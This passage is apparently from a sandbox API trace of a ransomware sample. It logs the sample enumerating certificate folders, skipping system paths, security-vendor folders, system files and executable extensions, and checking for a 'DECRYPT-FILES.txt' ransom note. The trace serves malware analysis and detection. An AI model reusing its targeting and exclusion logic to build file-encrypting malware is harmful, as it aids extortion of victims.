HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\Program Files") returned 0x0 [0180.883] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch=":\\Windows") returned 0x0 [0180.883] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\Games\\") returned 0x0 [0180.883] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.883] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.883] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.883] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.883] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.883] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\All Users") returned 0x0 [0180.883] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.883] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.883] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.883] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="AhnLab") returned 0x0 [0180.883] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.883] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned 78 [0180.883] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.883] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\\\0a16c9.tmp") returned 89 [0180.883] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0180.885] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned 78 [0180.885] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.885] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\\\DECRYPT-FILES.txt") returned 96 [0180.885] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.886] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned 78 [0180.886] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" [0180.886] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeef05360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef05360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0180.886] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.886] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeef05360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef05360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.886] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.886] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.886] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeef05360, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeef05360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef05360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.886] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.886] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.886] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.886] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.886] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.886] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.886] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.886] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.887] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.887] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.887] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.887] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.887] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.887] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.887] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.887] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned 78 [0180.887] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.887] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\" [0180.887] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\0a16c9.tmp" [0180.887] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.887] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.887] CloseHandle (hObject=0x0) returned 0 [0180.887] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.887] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0180.887] lstrcmpW (lpString1="Certificates", lpString2=".") returned 1 [0180.887] lstrcmpW (lpString1="Certificates", lpString2="..") returned 1 [0180.887] lstrcatW (in: lpString1="Certificates", lpString2="\\" | out: lpString1="Certificates\\") returned="Certificates\\" [0180.888] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="Certificates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\" [0180.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\Program Files") returned 0x0 [0180.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch=":\\Windows") returned 0x0 [0180.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\Games\\") returned 0x0 [0180.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\All Users") returned 0x0 [0180.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="AhnLab") returned 0x0 [0180.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.888] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned 91 [0180.888] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.888] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\\\0a16c9.tmp") returned 102 [0180.888] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0180.888] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned 91 [0180.889] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.889] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\\\DECRYPT-FILES.txt") returned 109 [0180.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.889] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned 91 [0180.889] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" [0180.889] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeef05360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef05360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0180.890] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.890] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeef05360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef05360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.890] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.890] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.890] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeef05360, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeef05360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeef05360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.890] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.890] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.890] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.890] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.890] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.890] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.890] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.890] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.890] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.890] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.890] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.890] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.890] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.890] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.890] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.890] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned 91 [0180.890] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.890] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\" [0180.890] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\0a16c9.tmp" [0180.890] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.891] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.891] CloseHandle (hObject=0x0) returned 0 [0180.891] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.891] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab03f580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.891] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.891] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab03f580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.891] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0180.892] CloseHandle (hObject=0x27c) returned 1 [0180.892] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CRLs", cAlternateFileName="")) returned 1 [0180.892] lstrcmpW (lpString1="CRLs", lpString2=".") returned 1 [0180.892] lstrcmpW (lpString1="CRLs", lpString2="..") returned 1 [0180.892] lstrcatW (in: lpString1="CRLs", lpString2="\\" | out: lpString1="CRLs\\") returned="CRLs\\" [0180.892] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="CRLs\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\" [0180.892] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\Program Files") returned 0x0 [0180.892] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch=":\\Windows") returned 0x0 [0180.892] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\Games\\") returned 0x0 [0180.892] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.892] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.892] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.892] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.892] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.892] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\All Users") returned 0x0 [0180.892] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.892] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.892] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.892] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="AhnLab") returned 0x0 [0180.892] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.892] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned 83 [0180.892] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.892] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\\\0a16c9.tmp") returned 94 [0180.892] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js 